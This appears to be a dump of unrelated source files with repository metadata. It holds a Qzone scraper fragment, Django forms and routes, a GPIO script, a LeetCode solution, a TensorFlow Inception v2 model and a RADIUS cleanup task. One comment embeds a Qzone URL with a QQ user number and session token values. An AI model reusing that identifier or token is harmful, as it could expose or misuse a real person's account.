host = "https://h5.qzone.qq.com/proxy/domain/base.qzone.qq.com/cgi-bin/right/get_entryuinlist.cgi?"
#https://h5.qzone.qq.com/proxy/domain/base.qzone.qq.com/cgi-bin/right/get_entryuinlist.cgi?uin=284182470&fupdate=1&action=1&offset=200&g_tk=1350570173&qzonetoken=8114052f3d145601114b9b3f8caad4ad2853b418b9c345f42af296d6d3e2c980b592a1b7c52273aaa0
url = host + parse.urlencode(params)
return url
def check_path(path):
'''This method use to check if the path is exists.
If not, create that
'''
if not os.path.exists(path):
os.mkdir(path)
| [
"zlq164114@sina.com"
] | zlq164114@sina.com |
08b2432bf85b349c0854e59b7fdc613edfc2fe22 | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_266/ch10_2019_03_08_10_59_34_133923.py | 5f6fc7c074676543b2b99848c0e35abf7b089d59 | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 85 | py | def libras_para_kg(lb):
kg = lb/2.204622
return (float('{0:.6f}'.format(kg))) | [
"you@example.com"
] | you@example.com |
3396bba7978380eaf9eadb1be37f112de85b3074 | 3aafebe8dda3732fdc354df3c253a56762d99bf2 | /integral_view/forms/remote_replication_forms.py | f50fc1ab09b3e7b3e4f2d99ee37638a49cebdb3f | [] | no_license | fractalio/integralstor | e666566301f793cb598a08778861b42710e34e19 | 1aa3e8000e7b676afb3fcadf6627991cc84c62e6 | refs/heads/master | 2021-06-24T15:41:09.400882 | 2017-09-13T06:31:55 | 2017-09-13T14:27:10 | 103,245,335 | 1 | 0 | null | 2017-09-12T08:44:05 | 2017-09-12T08:44:05 | null | UTF-8 | Python | false | false | 4,537 | py | from django import forms
class ZFSMode(forms.Form):
target_pool = forms.CharField()
def clean_target_pool(self):
target_pool = self.cleaned_data['target_pool']
if target_pool and (target_pool.find('\'') >= 0 or target_pool.find('\"') >= 0):
self._errors["target_pool"] = self.error_class(
["Pool name cannot contain single or double quotes."])
if target_pool and target_pool.isdigit():
self._errors["target_pool"] = self.error_class(
["Pool name cannot start with a number."])
return target_pool
class RsyncMode(forms.Form):
local_path = forms.CharField()
remote_path = forms.CharField()
rsync_type = forms.ChoiceField(choices=[('push', 'local host to remote host(push)'), (
'pull', 'remote host to local host(pull)'), ('local', 'within the local host')])
is_between_integralstor = forms.BooleanField(
widget=forms.CheckboxInput(attrs={'checked': 'checked'}), required=False)
# is_between_integralstor = forms.BooleanField(required=False)
def __init__(self, *args, **kwargs):
switches = None
initial = None
switch_ch = []
if kwargs:
if 'switches' in kwargs:
switches = kwargs.pop('switches')
if 'initial' in kwargs:
initial = kwargs.pop('initial')
super(RsyncMode, self).__init__(*args, **kwargs)
if switches:
for switch, val in switches.items():
switch_ch.append(
({switch: switches[switch]}, val['description']))
if val['is_arg'] == True:
self.fields['%s_arg' %
val['id']] = forms.CharField(required=False)
self.fields['switches'] = forms.MultipleChoiceField(
widget=forms.widgets.CheckboxSelectMultiple,
choices=switch_ch,
required=False)
class CreateRemoteReplication(ZFSMode, RsyncMode):
target_ip = forms.GenericIPAddressField(protocol='IPv4')
def __init__(self, *args, **kwargs):
modes = []
select_mode = None
datasets = None
initial = None
if kwargs:
if 'modes' in kwargs:
modes = kwargs.pop('modes')
if 'select_mode' in kwargs:
select_mode = str(kwargs.pop('select_mode'))
if 'datasets' in kwargs:
datasets = kwargs.pop('datasets')
if 'initial' in kwargs:
initial = kwargs.pop('initial')
super(CreateRemoteReplication, self).__init__(*args, **kwargs)
ch = []
if modes:
for mode in modes:
tup = (mode, mode)
ch.append(tup)
else:
ch.append((None, 'None'))
self.fields['modes'] = forms.ChoiceField(choices=ch)
if select_mode:
self.fields['select_mode'] = forms.CharField(
initial=str(select_mode))
if select_mode and select_mode == 'zfs':
self.fields['local_path'] = forms.CharField(required=False)
self.fields['remote_path'] = forms.CharField(required=False)
self.fields['rsync_type'] = forms.ChoiceField(required=False)
self.fields['switches'] = forms.MultipleChoiceField(required=False)
src_ds_ch = []
if datasets:
for dataset in datasets:
tup = (dataset, dataset)
src_ds_ch.append(tup)
else:
src_ds_ch.append((None, 'None'))
self.fields['source_dataset'] = forms.ChoiceField(choices=src_ds_ch)
if select_mode and select_mode == 'rsync':
self.fields['target_pool'] = forms.CharField(
required=False, initial=None)
if datasets:
self.fields['local_path'] = forms.CharField(
initial='/%s' % datasets[0])
else:
self.fields['local_path'] = forms.CharField(
initial='')
def clean_target_ip(self):
target_ip = str(self.cleaned_data['target_ip'])
rsync_type = str(self.cleaned_data['rsync_type'])
# if target_ip and rsync_type:
# if target_ip == '0.0.0.0':
if target_ip == '0.0.0.0' and rsync_type != 'local':
self._errors["target_ip"] = self.error_class(
["Please provide a valid IP"])
return target_ip
# vim: tabstop=8 softtabstop=0 expandtab ai shiftwidth=4 smarttab
| [
"ram@fractalio.com"
] | ram@fractalio.com |
dcd6a3c012dc40f933af56f937d8366be20b4fbd | 633a578567b91d7c5e255ad4b15aea9730ad7bd1 | /ToDo/ToDoBox/urls.py | 07f578423dcca78ac26926c295aea8aa92963861 | [] | no_license | Daniel98p/ToDoProject | 7dcd66ec9fa073b4ba7a2a021bc4eb9941aaae66 | 223bcd871cd4000ed9baeeaa959393ba6486bb2e | refs/heads/master | 2022-09-18T04:09:35.709406 | 2020-05-30T15:50:34 | 2020-05-30T15:50:34 | 250,861,691 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 313 | py | from django.urls import path
from . import views
urlpatterns = [
path('', views.index, name='index'),
path('delete/<int:obj_id>', views.delete_todo, name='delete_todo'),
path('display/', views.display, name='display'),
path('activities-chart/', views.activities_chart, name='activities-chart')
] | [
"danielmichalik98@wp.pl"
] | danielmichalik98@wp.pl |
8bc687a4d4395da2783d0016ec66dbbb5e676f1e | 91f3294f69b254a2a32e92ae87ecc0e4dcf3b82d | /src/GPIO_clean.py | af98e9464cd4e46a33d8426e25ae7f91b993c5cf | [] | no_license | Karijini/photobooth | db7fe003eecb6860b2b44a67ef76f641c60438ad | 128cdce37009e3269cf6bf1a1e653e64afa814f5 | refs/heads/master | 2021-01-10T15:56:31.163671 | 2016-03-31T13:30:41 | 2016-03-31T13:30:41 | 54,665,938 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 210 | py | import RPi.GPIO as GPIO
GPIO.setmode(GPIO.BCM)
GPIO.setup(17,GPIO.OUT)
GPIO.setup(23,GPIO.OUT)
GPIO.setup(4,GPIO.IN, pull_up_down=GPIO.PUD_UP)
GPIO.setup(18,GPIO.IN, pull_up_down=GPIO.PUD_UP)
GPIO.cleanup()
| [
"sebastian.thinnes@gmx.de"
] | sebastian.thinnes@gmx.de |
f514206567ca63e896cbbc56628b8df356f2f308 | c957b4663cc4cb21e5172f23c6989031be8c3e5b | /python/888. Fair Candy Swap.py | 95c36e992773b54e7b4c72dfd9439b8971c51eb4 | [] | no_license | gajanlee/leetcode | e061dc37af0f83bf2bce00c391c0b8a9f3177b22 | 0d3c8477f05604a059e58a8764ce0d8bd418edde | refs/heads/master | 2018-12-26T06:12:24.995542 | 2018-10-30T05:03:27 | 2018-10-30T05:03:27 | 102,965,574 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,393 | py | """
Alice and Bob have candy bars of different sizes: A[i] is the size of the i-th bar of candy that Alice has, and B[j] is the size of the j-th bar of candy that Bob has.
Since they are friends, they would like to exchange one candy bar each so that after the exchange, they both have the same total amount of candy. (The total amount of candy a person has is the sum of the sizes of candy bars they have.)
Return an integer array ans where ans[0] is the size of the candy bar that Alice must exchange, and ans[1] is the size of the candy bar that Bob must exchange.
If there are multiple answers, you may return any one of them. It is guaranteed an answer exists.
Example 1:
Input: A = [1,1], B = [2,2]
Output: [1,2]
Example 2:
Input: A = [1,2], B = [2,3]
Output: [1,2]
Example 3:
Input: A = [2], B = [1,3]
Output: [2,3]
Example 4:
Input: A = [1,2,5], B = [2,4]
Output: [5,4]
Note:
1 <= A.length <= 10000
1 <= B.length <= 10000
1 <= A[i] <= 100000
1 <= B[i] <= 100000
It is guaranteed that Alice and Bob have different total amounts of candy.
It is guaranteed there exists an answer.
"""
class Solution:
def fairCandySwap(self, A, B):
"""
:type A: List[int]
:type B: List[int]
:rtype: List[int]
"""
diff = (sum(A) - sum(B)) // 2
A = set(A)
for b in set(B):
if diff + b in A: return [diff+b, b] | [
"lee_jiazh@163.com"
] | lee_jiazh@163.com |
d32d96b452aff9a45fc6474cf6c25de294ad52a9 | cb2febe9c45fc50bd8a1f6af39f9a248d56f20d8 | /models/tensorflow/inception_v2.py | 84f4fc4dc6b2e277a8bd1d8c1161a035ba03f143 | [
"Apache-2.0"
] | permissive | mylolis/DLInfBench | 4e837a23edce390709f93e75729e50055fe8da1a | e582c8f06cf766c356f780f5488b287c840e4899 | refs/heads/master | 2022-02-14T08:22:08.754976 | 2019-08-16T06:19:51 | 2019-08-16T06:19:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 23,763 | py | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Contains the definition for inception v2 classification network."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from models.tensorflow import inception_utils
slim = tf.contrib.slim
trunc_normal = lambda stddev: tf.truncated_normal_initializer(0.0, stddev)
def inception_v2_base(inputs,
final_endpoint='Mixed_5c',
min_depth=16,
depth_multiplier=1.0,
scope=None):
"""Inception v2 (6a2).
Constructs an Inception v2 network from inputs to the given final endpoint.
This method can construct the network up to the layer inception(5b) as
described in http://arxiv.org/abs/1502.03167.
Args:
inputs: a tensor of shape [batch_size, height, width, channels].
final_endpoint: specifies the endpoint to construct the network up to. It
can be one of ['Conv2d_1a_7x7', 'MaxPool_2a_3x3', 'Conv2d_2b_1x1',
'Conv2d_2c_3x3', 'MaxPool_3a_3x3', 'Mixed_3b', 'Mixed_3c', 'Mixed_4a',
'Mixed_4b', 'Mixed_4c', 'Mixed_4d', 'Mixed_4e', 'Mixed_5a', 'Mixed_5b',
'Mixed_5c'].
min_depth: Minimum depth value (number of channels) for all convolution ops.
Enforced when depth_multiplier < 1, and not an active constraint when
depth_multiplier >= 1.
depth_multiplier: Float multiplier for the depth (number of channels)
for all convolution ops. The value must be greater than zero. Typical
usage will be to set this value in (0, 1) to reduce the number of
parameters or computation cost of the model.
scope: Optional variable_scope.
Returns:
tensor_out: output tensor corresponding to the final_endpoint.
end_points: a set of activations for external use, for example summaries or
losses.
Raises:
ValueError: if final_endpoint is not set to one of the predefined values,
or depth_multiplier <= 0
"""
# end_points will collect relevant activations for external use, for example
# summaries or losses.
end_points = {}
# Used to find thinned depths for each layer.
if depth_multiplier <= 0:
raise ValueError('depth_multiplier is not greater than zero.')
depth = lambda d: max(int(d * depth_multiplier), min_depth)
with tf.variable_scope(scope, 'InceptionV2', [inputs]):
with slim.arg_scope(
[slim.conv2d, slim.max_pool2d, slim.avg_pool2d, slim.separable_conv2d],
stride=1, padding='SAME'):
# Note that sizes in the comments below assume an input spatial size of
# 224x224, however, the inputs can be of any size greater 32x32.
# 224 x 224 x 3
end_point = 'Conv2d_1a_7x7'
# depthwise_multiplier here is different from depth_multiplier.
# depthwise_multiplier determines the output channels of the initial
# depthwise conv (see docs for tf.nn.separable_conv2d), while
# depth_multiplier controls the # channels of the subsequent 1x1
# convolution. Must have
# in_channels * depthwise_multipler <= out_channels
# so that the separable convolution is not overparameterized.
depthwise_multiplier = min(int(depth(64) / 3), 8)
net = slim.separable_conv2d(
inputs, depth(64), [7, 7], depth_multiplier=depthwise_multiplier,
stride=2, weights_initializer=trunc_normal(1.0),
scope=end_point)
end_points[end_point] = net
if end_point == final_endpoint: return net, end_points
# 112 x 112 x 64
end_point = 'MaxPool_2a_3x3'
net = slim.max_pool2d(net, [3, 3], scope=end_point, stride=2)
end_points[end_point] = net
if end_point == final_endpoint: return net, end_points
# 56 x 56 x 64
end_point = 'Conv2d_2b_1x1'
net = slim.conv2d(net, depth(64), [1, 1], scope=end_point,
weights_initializer=trunc_normal(0.1))
end_points[end_point] = net
if end_point == final_endpoint: return net, end_points
# 56 x 56 x 64
end_point = 'Conv2d_2c_3x3'
net = slim.conv2d(net, depth(192), [3, 3], scope=end_point)
end_points[end_point] = net
if end_point == final_endpoint: return net, end_points
# 56 x 56 x 192
end_point = 'MaxPool_3a_3x3'
net = slim.max_pool2d(net, [3, 3], scope=end_point, stride=2)
end_points[end_point] = net
if end_point == final_endpoint: return net, end_points
# 28 x 28 x 192
# Inception module.
end_point = 'Mixed_3b'
with tf.variable_scope(end_point):
with tf.variable_scope('Branch_0'):
branch_0 = slim.conv2d(net, depth(64), [1, 1], scope='Conv2d_0a_1x1')
with tf.variable_scope('Branch_1'):
branch_1 = slim.conv2d(
net, depth(64), [1, 1],
weights_initializer=trunc_normal(0.09),
scope='Conv2d_0a_1x1')
branch_1 = slim.conv2d(branch_1, depth(64), [3, 3],
scope='Conv2d_0b_3x3')
with tf.variable_scope('Branch_2'):
branch_2 = slim.conv2d(
net, depth(64), [1, 1],
weights_initializer=trunc_normal(0.09),
scope='Conv2d_0a_1x1')
branch_2 = slim.conv2d(branch_2, depth(96), [3, 3],
scope='Conv2d_0b_3x3')
branch_2 = slim.conv2d(branch_2, depth(96), [3, 3],
scope='Conv2d_0c_3x3')
with tf.variable_scope('Branch_3'):
branch_3 = slim.avg_pool2d(net, [3, 3], scope='AvgPool_0a_3x3')
branch_3 = slim.conv2d(
branch_3, depth(32), [1, 1],
weights_initializer=trunc_normal(0.1),
scope='Conv2d_0b_1x1')
net = tf.concat(axis=3, values=[branch_0, branch_1, branch_2, branch_3])
end_points[end_point] = net
if end_point == final_endpoint: return net, end_points
# 28 x 28 x 256
end_point = 'Mixed_3c'
with tf.variable_scope(end_point):
with tf.variable_scope('Branch_0'):
branch_0 = slim.conv2d(net, depth(64), [1, 1], scope='Conv2d_0a_1x1')
with tf.variable_scope('Branch_1'):
branch_1 = slim.conv2d(
net, depth(64), [1, 1],
weights_initializer=trunc_normal(0.09),
scope='Conv2d_0a_1x1')
branch_1 = slim.conv2d(branch_1, depth(96), [3, 3],
scope='Conv2d_0b_3x3')
with tf.variable_scope('Branch_2'):
branch_2 = slim.conv2d(
net, depth(64), [1, 1],
weights_initializer=trunc_normal(0.09),
scope='Conv2d_0a_1x1')
branch_2 = slim.conv2d(branch_2, depth(96), [3, 3],
scope='Conv2d_0b_3x3')
branch_2 = slim.conv2d(branch_2, depth(96), [3, 3],
scope='Conv2d_0c_3x3')
with tf.variable_scope('Branch_3'):
branch_3 = slim.avg_pool2d(net, [3, 3], scope='AvgPool_0a_3x3')
branch_3 = slim.conv2d(
branch_3, depth(64), [1, 1],
weights_initializer=trunc_normal(0.1),
scope='Conv2d_0b_1x1')
net = tf.concat(axis=3, values=[branch_0, branch_1, branch_2, branch_3])
end_points[end_point] = net
if end_point == final_endpoint: return net, end_points
# 28 x 28 x 320
end_point = 'Mixed_4a'
with tf.variable_scope(end_point):
with tf.variable_scope('Branch_0'):
branch_0 = slim.conv2d(
net, depth(128), [1, 1],
weights_initializer=trunc_normal(0.09),
scope='Conv2d_0a_1x1')
branch_0 = slim.conv2d(branch_0, depth(160), [3, 3], stride=2,
scope='Conv2d_1a_3x3')
with tf.variable_scope('Branch_1'):
branch_1 = slim.conv2d(
net, depth(64), [1, 1],
weights_initializer=trunc_normal(0.09),
scope='Conv2d_0a_1x1')
branch_1 = slim.conv2d(
branch_1, depth(96), [3, 3], scope='Conv2d_0b_3x3')
branch_1 = slim.conv2d(
branch_1, depth(96), [3, 3], stride=2, scope='Conv2d_1a_3x3')
with tf.variable_scope('Branch_2'):
branch_2 = slim.max_pool2d(
net, [3, 3], stride=2, scope='MaxPool_1a_3x3')
net = tf.concat(axis=3, values=[branch_0, branch_1, branch_2])
end_points[end_point] = net
if end_point == final_endpoint: return net, end_points
# 14 x 14 x 576
end_point = 'Mixed_4b'
with tf.variable_scope(end_point):
with tf.variable_scope('Branch_0'):
branch_0 = slim.conv2d(net, depth(224), [1, 1], scope='Conv2d_0a_1x1')
with tf.variable_scope('Branch_1'):
branch_1 = slim.conv2d(
net, depth(64), [1, 1],
weights_initializer=trunc_normal(0.09),
scope='Conv2d_0a_1x1')
branch_1 = slim.conv2d(
branch_1, depth(96), [3, 3], scope='Conv2d_0b_3x3')
with tf.variable_scope('Branch_2'):
branch_2 = slim.conv2d(
net, depth(96), [1, 1],
weights_initializer=trunc_normal(0.09),
scope='Conv2d_0a_1x1')
branch_2 = slim.conv2d(branch_2, depth(128), [3, 3],
scope='Conv2d_0b_3x3')
branch_2 = slim.conv2d(branch_2, depth(128), [3, 3],
scope='Conv2d_0c_3x3')
with tf.variable_scope('Branch_3'):
branch_3 = slim.avg_pool2d(net, [3, 3], scope='AvgPool_0a_3x3')
branch_3 = slim.conv2d(
branch_3, depth(128), [1, 1],
weights_initializer=trunc_normal(0.1),
scope='Conv2d_0b_1x1')
net = tf.concat(axis=3, values=[branch_0, branch_1, branch_2, branch_3])
end_points[end_point] = net
if end_point == final_endpoint: return net, end_points
# 14 x 14 x 576
end_point = 'Mixed_4c'
with tf.variable_scope(end_point):
with tf.variable_scope('Branch_0'):
branch_0 = slim.conv2d(net, depth(192), [1, 1], scope='Conv2d_0a_1x1')
with tf.variable_scope('Branch_1'):
branch_1 = slim.conv2d(
net, depth(96), [1, 1],
weights_initializer=trunc_normal(0.09),
scope='Conv2d_0a_1x1')
branch_1 = slim.conv2d(branch_1, depth(128), [3, 3],
scope='Conv2d_0b_3x3')
with tf.variable_scope('Branch_2'):
branch_2 = slim.conv2d(
net, depth(96), [1, 1],
weights_initializer=trunc_normal(0.09),
scope='Conv2d_0a_1x1')
branch_2 = slim.conv2d(branch_2, depth(128), [3, 3],
scope='Conv2d_0b_3x3')
branch_2 = slim.conv2d(branch_2, depth(128), [3, 3],
scope='Conv2d_0c_3x3')
with tf.variable_scope('Branch_3'):
branch_3 = slim.avg_pool2d(net, [3, 3], scope='AvgPool_0a_3x3')
branch_3 = slim.conv2d(
branch_3, depth(128), [1, 1],
weights_initializer=trunc_normal(0.1),
scope='Conv2d_0b_1x1')
net = tf.concat(axis=3, values=[branch_0, branch_1, branch_2, branch_3])
end_points[end_point] = net
if end_point == final_endpoint: return net, end_points
# 14 x 14 x 576
end_point = 'Mixed_4d'
with tf.variable_scope(end_point):
with tf.variable_scope('Branch_0'):
branch_0 = slim.conv2d(net, depth(160), [1, 1], scope='Conv2d_0a_1x1')
with tf.variable_scope('Branch_1'):
branch_1 = slim.conv2d(
net, depth(128), [1, 1],
weights_initializer=trunc_normal(0.09),
scope='Conv2d_0a_1x1')
branch_1 = slim.conv2d(branch_1, depth(160), [3, 3],
scope='Conv2d_0b_3x3')
with tf.variable_scope('Branch_2'):
branch_2 = slim.conv2d(
net, depth(128), [1, 1],
weights_initializer=trunc_normal(0.09),
scope='Conv2d_0a_1x1')
branch_2 = slim.conv2d(branch_2, depth(160), [3, 3],
scope='Conv2d_0b_3x3')
branch_2 = slim.conv2d(branch_2, depth(160), [3, 3],
scope='Conv2d_0c_3x3')
with tf.variable_scope('Branch_3'):
branch_3 = slim.avg_pool2d(net, [3, 3], scope='AvgPool_0a_3x3')
branch_3 = slim.conv2d(
branch_3, depth(96), [1, 1],
weights_initializer=trunc_normal(0.1),
scope='Conv2d_0b_1x1')
net = tf.concat(axis=3, values=[branch_0, branch_1, branch_2, branch_3])
end_points[end_point] = net
if end_point == final_endpoint: return net, end_points
# 14 x 14 x 576
end_point = 'Mixed_4e'
with tf.variable_scope(end_point):
with tf.variable_scope('Branch_0'):
branch_0 = slim.conv2d(net, depth(96), [1, 1], scope='Conv2d_0a_1x1')
with tf.variable_scope('Branch_1'):
branch_1 = slim.conv2d(
net, depth(128), [1, 1],
weights_initializer=trunc_normal(0.09),
scope='Conv2d_0a_1x1')
branch_1 = slim.conv2d(branch_1, depth(192), [3, 3],
scope='Conv2d_0b_3x3')
with tf.variable_scope('Branch_2'):
branch_2 = slim.conv2d(
net, depth(160), [1, 1],
weights_initializer=trunc_normal(0.09),
scope='Conv2d_0a_1x1')
branch_2 = slim.conv2d(branch_2, depth(192), [3, 3],
scope='Conv2d_0b_3x3')
branch_2 = slim.conv2d(branch_2, depth(192), [3, 3],
scope='Conv2d_0c_3x3')
with tf.variable_scope('Branch_3'):
branch_3 = slim.avg_pool2d(net, [3, 3], scope='AvgPool_0a_3x3')
branch_3 = slim.conv2d(
branch_3, depth(96), [1, 1],
weights_initializer=trunc_normal(0.1),
scope='Conv2d_0b_1x1')
net = tf.concat(axis=3, values=[branch_0, branch_1, branch_2, branch_3])
end_points[end_point] = net
if end_point == final_endpoint: return net, end_points
# 14 x 14 x 576
end_point = 'Mixed_5a'
with tf.variable_scope(end_point):
with tf.variable_scope('Branch_0'):
branch_0 = slim.conv2d(
net, depth(128), [1, 1],
weights_initializer=trunc_normal(0.09),
scope='Conv2d_0a_1x1')
branch_0 = slim.conv2d(branch_0, depth(192), [3, 3], stride=2,
scope='Conv2d_1a_3x3')
with tf.variable_scope('Branch_1'):
branch_1 = slim.conv2d(
net, depth(192), [1, 1],
weights_initializer=trunc_normal(0.09),
scope='Conv2d_0a_1x1')
branch_1 = slim.conv2d(branch_1, depth(256), [3, 3],
scope='Conv2d_0b_3x3')
branch_1 = slim.conv2d(branch_1, depth(256), [3, 3], stride=2,
scope='Conv2d_1a_3x3')
with tf.variable_scope('Branch_2'):
branch_2 = slim.max_pool2d(net, [3, 3], stride=2,
scope='MaxPool_1a_3x3')
net = tf.concat(axis=3, values=[branch_0, branch_1, branch_2])
end_points[end_point] = net
if end_point == final_endpoint: return net, end_points
# 7 x 7 x 1024
end_point = 'Mixed_5b'
with tf.variable_scope(end_point):
with tf.variable_scope('Branch_0'):
branch_0 = slim.conv2d(net, depth(352), [1, 1], scope='Conv2d_0a_1x1')
with tf.variable_scope('Branch_1'):
branch_1 = slim.conv2d(
net, depth(192), [1, 1],
weights_initializer=trunc_normal(0.09),
scope='Conv2d_0a_1x1')
branch_1 = slim.conv2d(branch_1, depth(320), [3, 3],
scope='Conv2d_0b_3x3')
with tf.variable_scope('Branch_2'):
branch_2 = slim.conv2d(
net, depth(160), [1, 1],
weights_initializer=trunc_normal(0.09),
scope='Conv2d_0a_1x1')
branch_2 = slim.conv2d(branch_2, depth(224), [3, 3],
scope='Conv2d_0b_3x3')
branch_2 = slim.conv2d(branch_2, depth(224), [3, 3],
scope='Conv2d_0c_3x3')
with tf.variable_scope('Branch_3'):
branch_3 = slim.avg_pool2d(net, [3, 3], scope='AvgPool_0a_3x3')
branch_3 = slim.conv2d(
branch_3, depth(128), [1, 1],
weights_initializer=trunc_normal(0.1),
scope='Conv2d_0b_1x1')
net = tf.concat(axis=3, values=[branch_0, branch_1, branch_2, branch_3])
end_points[end_point] = net
if end_point == final_endpoint: return net, end_points
# 7 x 7 x 1024
end_point = 'Mixed_5c'
with tf.variable_scope(end_point):
with tf.variable_scope('Branch_0'):
branch_0 = slim.conv2d(net, depth(352), [1, 1], scope='Conv2d_0a_1x1')
with tf.variable_scope('Branch_1'):
branch_1 = slim.conv2d(
net, depth(192), [1, 1],
weights_initializer=trunc_normal(0.09),
scope='Conv2d_0a_1x1')
branch_1 = slim.conv2d(branch_1, depth(320), [3, 3],
scope='Conv2d_0b_3x3')
with tf.variable_scope('Branch_2'):
branch_2 = slim.conv2d(
net, depth(192), [1, 1],
weights_initializer=trunc_normal(0.09),
scope='Conv2d_0a_1x1')
branch_2 = slim.conv2d(branch_2, depth(224), [3, 3],
scope='Conv2d_0b_3x3')
branch_2 = slim.conv2d(branch_2, depth(224), [3, 3],
scope='Conv2d_0c_3x3')
with tf.variable_scope('Branch_3'):
branch_3 = slim.max_pool2d(net, [3, 3], scope='MaxPool_0a_3x3')
branch_3 = slim.conv2d(
branch_3, depth(128), [1, 1],
weights_initializer=trunc_normal(0.1),
scope='Conv2d_0b_1x1')
net = tf.concat(axis=3, values=[branch_0, branch_1, branch_2, branch_3])
end_points[end_point] = net
if end_point == final_endpoint: return net, end_points
raise ValueError('Unknown final endpoint %s' % final_endpoint)
def inception_v2(inputs,
num_classes=1000,
is_training=True,
dropout_keep_prob=0.8,
min_depth=16,
depth_multiplier=1.0,
prediction_fn=slim.softmax,
spatial_squeeze=True,
reuse=None,
scope='InceptionV2'):
"""Inception v2 model for classification.
Constructs an Inception v2 network for classification as described in
http://arxiv.org/abs/1502.03167.
The default image size used to train this network is 224x224.
Args:
inputs: a tensor of shape [batch_size, height, width, channels].
num_classes: number of predicted classes.
is_training: whether is training or not.
dropout_keep_prob: the percentage of activation values that are retained.
min_depth: Minimum depth value (number of channels) for all convolution ops.
Enforced when depth_multiplier < 1, and not an active constraint when
depth_multiplier >= 1.
depth_multiplier: Float multiplier for the depth (number of channels)
for all convolution ops. The value must be greater than zero. Typical
usage will be to set this value in (0, 1) to reduce the number of
parameters or computation cost of the model.
prediction_fn: a function to get predictions out of logits.
spatial_squeeze: if True, logits is of shape [B, C], if false logits is
of shape [B, 1, 1, C], where B is batch_size and C is number of classes.
reuse: whether or not the network and its variables should be reused. To be
able to reuse 'scope' must be given.
scope: Optional variable_scope.
Returns:
logits: the pre-softmax activations, a tensor of size
[batch_size, num_classes]
end_points: a dictionary from components of the network to the corresponding
activation.
Raises:
ValueError: if final_endpoint is not set to one of the predefined values,
or depth_multiplier <= 0
"""
if depth_multiplier <= 0:
raise ValueError('depth_multiplier is not greater than zero.')
# Final pooling and prediction
with tf.variable_scope(scope, 'InceptionV2', [inputs, num_classes],
reuse=reuse) as scope:
with slim.arg_scope([slim.batch_norm, slim.dropout],
is_training=is_training):
net, end_points = inception_v2_base(
inputs, scope=scope, min_depth=min_depth,
depth_multiplier=depth_multiplier)
with tf.variable_scope('Logits'):
kernel_size = _reduced_kernel_size_for_small_input(net, [7, 7])
net = slim.avg_pool2d(net, kernel_size, padding='VALID',
scope='AvgPool_1a_{}x{}'.format(*kernel_size))
# 1 x 1 x 1024
net = slim.dropout(net, keep_prob=dropout_keep_prob, scope='Dropout_1b')
logits = slim.conv2d(net, num_classes, [1, 1], activation_fn=None,
normalizer_fn=None, scope='Conv2d_1c_1x1')
if spatial_squeeze:
logits = tf.squeeze(logits, [1, 2], name='SpatialSqueeze')
end_points['Logits'] = logits
end_points['Predictions'] = prediction_fn(logits, scope='Predictions')
return logits, end_points
inception_v2.default_image_size = 224
def _reduced_kernel_size_for_small_input(input_tensor, kernel_size):
"""Define kernel size which is automatically reduced for small input.
If the shape of the input images is unknown at graph construction time this
function assumes that the input images are is large enough.
Args:
input_tensor: input tensor of size [batch_size, height, width, channels].
kernel_size: desired kernel size of length 2: [kernel_height, kernel_width]
Returns:
a tensor with the kernel size.
TODO(jrru): Make this function work with unknown shapes. Theoretically, this
can be done with the code below. Problems are two-fold: (1) If the shape was
known, it will be lost. (2) inception.slim.ops._two_element_tuple cannot
handle tensors that define the kernel size.
shape = tf.shape(input_tensor)
return = tf.pack([tf.minimum(shape[1], kernel_size[0]),
tf.minimum(shape[2], kernel_size[1])])
"""
shape = input_tensor.get_shape().as_list()
if shape[1] is None or shape[2] is None:
kernel_size_out = kernel_size
else:
kernel_size_out = [min(shape[1], kernel_size[0]),
min(shape[2], kernel_size[1])]
return kernel_size_out
inception_v2_arg_scope = inception_utils.inception_arg_scope
| [
"shiyemin2@qq.com"
] | shiyemin2@qq.com |
f9285da227e9420e40a24aa622a62fb9b72b2f6a | df44affab179c2546fb3e0d1dc29eebcfdf51c1c | /toughradius/modules/tasks/clean_billing.py | 5ab17ac1aa2881f6590a917b6c8fb1e0cfa53ef6 | [] | no_license | sailorhdx/taurusradius | 121c508e7faffaddcd5326d2b6d3710eaf0ed08e | 92d30820611a0c9102ae41713ea3c35437a3c6ee | refs/heads/master | 2021-01-22T02:28:31.543338 | 2017-06-17T02:15:33 | 2017-06-17T02:15:33 | 92,362,551 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,619 | py | #!/usr/bin/env python
# coding=utf-8
import os
import sys
import time
import datetime
from toughradius.toughlib import utils
from toughradius.toughlib import dispatch, logger
from toughradius.toughlib.dbutils import make_db
from toughradius.modules import models
from toughradius.toughlib.db_backup import DBBackup
from toughradius.modules.tasks.task_base import TaseBasic
from twisted.internet import reactor
from toughradius.modules import taskd
class ClearBillingTask(TaseBasic):
__name__ = 'billing-clean'
def __init__(self, taskd, **kwargs):
TaseBasic.__init__(self, taskd, **kwargs)
def get_next_interval(self):
return 86400
def first_delay(self):
return 120
def process(self, *args, **kwargs):
self.logtimes()
next_interval = self.get_next_interval()
with make_db(self.db) as db:
try:
td = datetime.timedelta(days=7)
_now = datetime.datetime.now()
edate = (_now - td).strftime('%Y-%m-%d 23:59:59')
db.query(models.TrBilling).filter(models.TrBilling.create_time < edate).delete()
db.commit()
logger.info(u'计费缓存数据清理完成,下次执行还需等待 %s' % self.format_time(next_interval), trace='task')
except Exception as err:
logger.info(u'计费缓存数据清理失败,%s, 下次执行还需等待 %s' % (repr(err), self.format_time(next_interval)), trace='task')
logger.exception(err)
